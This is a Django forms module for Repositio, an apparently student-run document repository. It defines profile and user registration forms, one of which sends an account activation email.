Python
|
mit
| 2,750
| 0.016364
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from django import forms
from django.core.mail import send_mail
from django.template import Context
from ProyectoDeGrado.settings import MEDIA_ROOT
from apps.administrador.models import *
from django.contrib.auth.models import User
class PerfilForm(forms.ModelForm):
class Meta:
model = Perfil
fields = ['usuario', 'avatar', 'sede', 'codigo', 'carrera']
widgets = {
'usuario': forms.Select(attrs={'class':'selectpicker', 'disabled':'disabled', 'data-width':'100%', 'data-live-search':'true','data-container':'body'}),
'avatar':forms.FileInput(attrs={'class':'file'}),
'sede':forms.Select(attrs={'class':'selectpicker', 'data-width':'100%', 'data-live-search':'true','data-container':'body'}),
'codigo':forms.TextInput(attrs={'class':'form-control'}),
'carrera':forms.SelectMultiple(attrs={'class':'selectpicker', 'data-width':'100%', 'data-live-search':'true','data-container':'body'
|
,'title':'Seleccione sus carreras'})
}
def __init__(self, *args, **kwargs):
super(PerfilForm, self).__init__(*args, **kwargs)
self.fields['sede'].empty_label = "Seleccione la su sede"
def enviar(self, data):
link = "http://www.repositio.com/activate/"+data['username']+"/"+ data['activation_key']
message = "Continue con el proceso de registro por medio de este link "+link
|
send_mail(data['email_subject'], message, 'Repositio <repositio@gmail.com>', [data['username']+data['dominio']],fail_silently=False)
def save(self, data):
perfil = Perfil()
usuario = User.objects.get(username = data['username'])
perfil.usuario = usuario
perfil.activation_key=data['activation_key']
perfil.key_expires=datetime.datetime.strftime(datetime.datetime.now() + datetime.timedelta(days=2), "%Y-%m-%d %H:%M:%S")
perfil.save()
return perfil
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ['username', 'password', 'email', 'first_name', 'last_name']
widgets = {
'username': forms.TextInput(attrs={'class':'form-control'}),
'password': forms.PasswordInput(attrs={'class':'form-control'}),
'email': forms.EmailInput(attrs={'class':'form-control', 'disabled':'disabled'}),
'first_name': forms.TextInput(attrs={'class':'form-control'}),
'last_name': forms.TextInput(attrs={'class':'form-control'}),
}
def save(self, data):
usuario = User()
usuario.username = data['username']
usuario.email = data['username']+data['dominio']
usuario.save()
return usuario
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.